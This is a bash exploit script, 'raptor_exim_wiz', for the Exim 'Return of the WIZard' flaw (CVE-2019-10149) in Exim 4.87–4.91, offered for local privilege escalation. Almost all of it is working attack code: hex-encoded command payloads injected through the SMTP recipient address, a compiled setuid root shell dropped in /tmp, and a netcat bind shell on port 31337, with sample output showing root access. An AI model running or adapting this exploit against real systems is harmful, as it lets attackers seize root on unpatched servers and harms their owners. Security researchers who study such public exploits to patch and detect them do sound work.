#!/bin/bash## raptor_exim_wiz - "The Return of the WIZard" LPE exploit# Co

1. #!/bin/bash
2. #
3. # raptor_exim_wiz - "The Return of the WIZard" LPE exploit
4. # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
5. #
6. # A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
7. # Improper validation of recipient address in deliver_message()
8. # function in /src/deliver.c may lead to remote command execution.
9. # (CVE-2019-10149)
10. #
11. # This is a local privilege escalation exploit for "The Return
12. # of the WIZard" vulnerability reported by the Qualys Security
13. # Advisory team.
14. #
15. # Credits:
16. # Qualys Security Advisory team (kudos for your amazing research!)
17. # Dennis 'dhn' Herrmann (/dev/tcp technique)
18. #
19. # Usage (setuid method):
20. # $ id
21. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
22. # $ ./raptor_exim_wiz -m setuid
23. # Preparing setuid shell helper...
24. # Delivering setuid payload...
25. # [...]
26. # Waiting 5 seconds...
27. # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
28. # # id
29. # uid=0(root) gid=0(root) groups=0(root)
30. #
31. # Usage (netcat method):
32. # $ id
33. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
34. # $ ./raptor_exim_wiz -m netcat
35. # Delivering netcat payload...
36. # Waiting 5 seconds...
37. # localhost [127.0.0.1] 31337 (?) open
38. # id
39. # uid=0(root) gid=0(root) groups=0(root)
40. #
41. # Vulnerable platforms:
42. # Exim 4.87 - 4.91
43. #
44. # Tested against:
45. # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
46. #
47. METHOD="setuid" # default method
48. PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
49. PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
50. # usage instructions
51. function usage()
52. {
53. echo "$0 [-m METHOD]"
54. echo "-m setuid : use the setuid payload (default)"
55. echo "-m netcat : use the netcat payload"
56. exit 1
57. }
58. # payload delivery
59. function exploit()
60. {
61. # connect to localhost:25
62. exec 3<>/dev/tcp/localhost/25
63. # deliver the payload
64. read -u 3 && echo $REPLY
65. echo "helo localhost" >&3
66. read -u 3 && echo $REPLY
67. echo "mail from:<>" >&3
68. read -u 3 && echo $REPLY
69. echo "rcpt to:<$PAYLOAD>" >&3
70. read -u 3 && echo $REPLY
71. echo "data" >&3
72. read -u 3 && echo $REPLY
73. for i in {1..31}
74. do
75. echo "Received: $i" >&3
76. done
77. echo "." >&3
78. read -u 3 && echo $REPLY
79. echo "quit" >&3
80. read -u 3 && echo $REPLY
81. }
82. # print banner
83. echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
84. echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
85. # parse command line
86. while [ ! -z "$1" ]; do
87. case $1 in
88. -m) shift; METHOD="$1"; shift;;
89. * ) usage
90. ;;
91. esac
92. done
93. if [ -z $METHOD ]; then
94. usage
95. fi
96. # setuid method
97. if [ $METHOD = "setuid" ]; then
98.  
99. # prepare a setuid shell helper to circumvent bash checks
100. echo "Preparing setuid shell helper..."
101. echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
102. gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
103. if [ $? -ne 0 ]; then
104. echo "Problems compiling setuid shell helper, check your gcc."
105. echo "Falling back to the /bin/sh method."
106. cp /bin/sh /tmp/pwned
107. fi
108. # select and deliver the payload
109. echo "Delivering $METHOD payload..."
110. PAYLOAD=$PAYLOAD_SETUID
111. exploit
112. # wait for the magic to happen and spawn our shell
113. echo "Waiting 5 seconds..."
114. sleep 5
115. ls -l /tmp/pwned
116. /tmp/pwned
117. # netcat method
118. elif [ $METHOD = "netcat" ]; then
119. # select and deliver the payload
120. echo "Delivering $METHOD payload..."
121. PAYLOAD=$PAYLOAD_NETCAT
122. exploit
123. # wait for the magic to happen and spawn our shell
124. echo "Waiting 5 seconds..."
125. sleep 5
126. nc -v 127.0.0.1 31337
127. # print help
128. else
129. usage
130. fi